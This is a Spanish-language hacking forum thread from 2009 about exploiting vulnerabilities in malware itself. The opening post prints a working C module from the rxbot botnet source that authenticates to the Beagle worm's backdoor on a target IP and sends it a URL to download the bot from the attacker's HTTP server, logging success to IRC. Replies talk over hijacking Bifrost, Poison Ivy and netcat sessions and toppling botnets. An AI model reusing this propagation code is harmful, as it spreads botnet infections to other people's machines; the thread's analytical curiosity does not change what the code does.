elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Buscar Ingresar Registrarse
14 Febrero 2012, 10:47  


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Explotar Vulnerabilidades de Malware ?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Explotar Vulnerabilidades de Malware ?  (Leído 2,024 veces)
Jaixon Jax


Desconectado Desconectado

Mensajes: 856



Ver Perfil
Explotar Vulnerabilidades de Malware ?
« en: 6 Noviembre 2009, 15:47 »

   ;D

  Bueno yo casi no posteo en este subforo pero he estado estudiandoe el source del rxbot y encontre este modulito :

Código
#include "includes.h"
#include "functions.h"
#include "externs.h"
 
#ifndef NO_BEAGLE
 
char BeagleAuth1[] = "\x43\xFF\xFF\xFF\x30\x30\x30\x01\x0A\x1F\x2B\x28\x2B\xA1\x32\x01";
char BeagleAuth2[] = "\x43\xFF\xFF\xFF\x30\x30\x30\x01\x0A\x28\x91\xA1\x2B\xE6\x60\x2F\x32\x8F\x60\x15\x1A\x20\x1A";
 
BOOL Beagle(EXINFO exinfo)
{
char *BeagleAuth, buffer[IRCLINE], botfile[MAX_PATH], fname[_MAX_FNAME], ext[_MAX_EXT];
 
BOOL success = FALSE;
 
WSADATA WSAData;
if (fWSAStartup(MAKEWORD(1,1), &WSAData)!=0)
return FALSE;
 
SOCKET sSock;
if((sSock = fsocket(PF_INET, SOCK_STREAM, IPPROTO_TCP)) != INVALID_SOCKET) {
SOCKADDR_IN ssin;
memset(&ssin, 0, sizeof(ssin));
ssin.sin_family = AF_INET;
ssin.sin_addr.s_addr = finet_addr(exinfo.ip);
ssin.sin_port = fhtons((unsigned short)exinfo.port);
 
if(fconnect(sSock, (LPSOCKADDR)&ssin, sizeof(ssin)) != SOCKET_ERROR) {
BeagleAuth = ((strcmp(exinfo.command, "beagle1") == 0)?(BeagleAuth1):(BeagleAuth2));
if(fsend(sSock, BeagleAuth, sizeof(BeagleAuth), 0) != SOCKET_ERROR) {
if (frecv(sSock, buffer, 8, 0) != SOCKET_ERROR) {
GetModuleFileName(0, botfile, sizeof(botfile));
_splitpath(botfile, NULL, NULL, fname, ext);
_snprintf(botfile, sizeof(botfile), "%s%s", fname, ext);
_snprintf(buffer,sizeof(buffer),"http://%s:%s/%s", GetIP(sSock), httpport, botfile);
 
if(fsend(sSock, buffer, sizeof(buffer), 0))
success = TRUE;
}
}
}
}
 
fclosesocket(sSock);
fWSACleanup();
 
if (success) {
_snprintf(buffer, sizeof(buffer), "[%s]: Exploiting IP: %s.", exploit[exinfo.exploit].name, exinfo.ip);
if (!exinfo.silent) irc_privmsg(exinfo.sock, exinfo.chan, buffer, exinfo.notice);
addlog(buffer);
exploit[exinfo.exploit].stats++;
}
 
return (success);
}
#endif

  Bueno por lo que puedo leer el programa escanea una ip y si encuentra que esta infectada con Baggle le descarga un exploit  :silbar: en principio me sorprendio por que si es asi es mas facil buscar vulnerabilidades en malware que en software legal ya que los programadores de malware casi no se preocupan por este tema en teoria se podria buscar x vulnerabilidad en un troyano y explotarla para introducir un nuevo malware ? supongo que es asi  :) me parece interesante el tema jeje  :¬¬
En línea

Tricalogo del buen forista:
  1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
  2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
  3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
Belial & Grimoire


Desconectado Desconectado

Mensajes: 314


Tea_Madhatter


Ver Perfil
Re: Explotar Vulnerabilidades de Malware ?
« Respuesta #1 en: 7 Noviembre 2009, 04:42 »

hola

suena interesante, y es cierto... lo importante de los malware es que funcionen, y no tanto la seguridad... esta es una muy buena idea
En línea

.                                 
FrozenFiu

Desconectado Desconectado

Mensajes: 1


Ver Perfil
Re: Explotar Vulnerabilidades de Malware ?
« Respuesta #2 en: 7 Noviembre 2009, 05:26 »

Lo interesante es encontrarle alguna vunerabilidad al Bifrost para que por ejemplo si alguien te intenta infectar hacrlo al revez y infectarlo uno :xD
En línea
[Zero]
Wiki

Desconectado Desconectado

Mensajes: 1.050


CALL DWORD PTR DS:[0]


Ver Perfil WWW
Re: Explotar Vulnerabilidades de Malware ?
« Respuesta #3 en: 8 Noviembre 2009, 20:18 »

Lo interesante es encontrarle alguna vunerabilidad al Bifrost para que por ejemplo si alguien te intenta infectar hacrlo al revez y infectarlo uno :xD

Eso ya está inventado  :xD.

Pues sí, lo más importante en el malware generalmente es que funcione y sea estable, además de que muchos programadores de malware no son programadores profesionales por lo tanto son más descuidados, o simplemente sacrificas seguridad por ahorrar unos bytes  :).

Incluso muchas veces no hace falta encontrar ningún overflow ni nada parecido, sino que el propio gusano/backdoor se queda escuchando por un puerto que alguien le mande algo para ejecutarlo. Yo éstos días le estoy metiendo mano al Poison Ivy  :silbar:.

Saludos  :)
En línea


“El Hombre, en su orgullo, creó a Dios a su imagen y semejanza.”
Nietzsche
Jaixon Jax


Desconectado Desconectado

Mensajes: 856



Ver Perfil
Re: Explotar Vulnerabilidades de Malware ?
« Respuesta #4 en: 8 Noviembre 2009, 20:46 »

   :¬¬ Y se puede ir mucho mas lejos se puede tirar abajo toda una Botnet obteniendo todas las trazas de todos los nodos  :) Teoricacamente funcionaria   :silbar:
« Última modificación: 8 Noviembre 2009, 21:03 por Jaixxon Jax » En línea

Tricalogo del buen forista:
  1.- No postear en hilos de Politica, ni religion, ni feminismo ni Machismo .....
  2.- Nunca solicitar ayuda por MP a alguien del staf .... ellos nunca responden ....
  3.- Aplaudir todos los "aportes" del staf aunque no los entiendas, o creas que no tienen importancia eso es buena onda ....
dark_hat

Desconectado Desconectado

Mensajes: 183



Ver Perfil
Re: Explotar Vulnerabilidades de Malware ?
« Respuesta #5 en: 27 Noviembre 2009, 13:50 »

Efectivamente hay varios worms con buffers overflows, de hecho una vez salió un gusano que se propagaba usando un fallo del worm sasser. http://www.vsantivirus.com/dabber-a.htm
En línea

Eso que huele es un poco de incienso,
eso marrón una tableta de turrón...
AlbertoBSD
Estudiante y
Colaborador
***
Desconectado Desconectado

Mensajes: 1.955


Anonymous & Paranoid


Ver Perfil WWW
Re: Explotar Vulnerabilidades de Malware ?
« Respuesta #6 en: 27 Noviembre 2009, 23:07 »

Eso suena tambien como una vulnerabilidad que tubo nc, entonces si sabias alguien se estaba conectado con netcat a x puerto entonces tu ponias tu propio exploit en listen y esperabas que un netcat se conectar para petarlo y tener el control de la maquina "Atacante"


Saludos
En línea

Bien Super Divertido
@wifigdlmx
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Explotar Vulnerabilidades CGI
Bugs y Exploits
Tracxus 5 1,668 Último mensaje 12 Enero 2011, 21:08
por berz3k
como explotar vulnerabilidades de Adobe Flash Media Server?
Hacking Avanzado
HALC12 1 880 Último mensaje 15 Julio 2011, 21:58
por HALC12
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines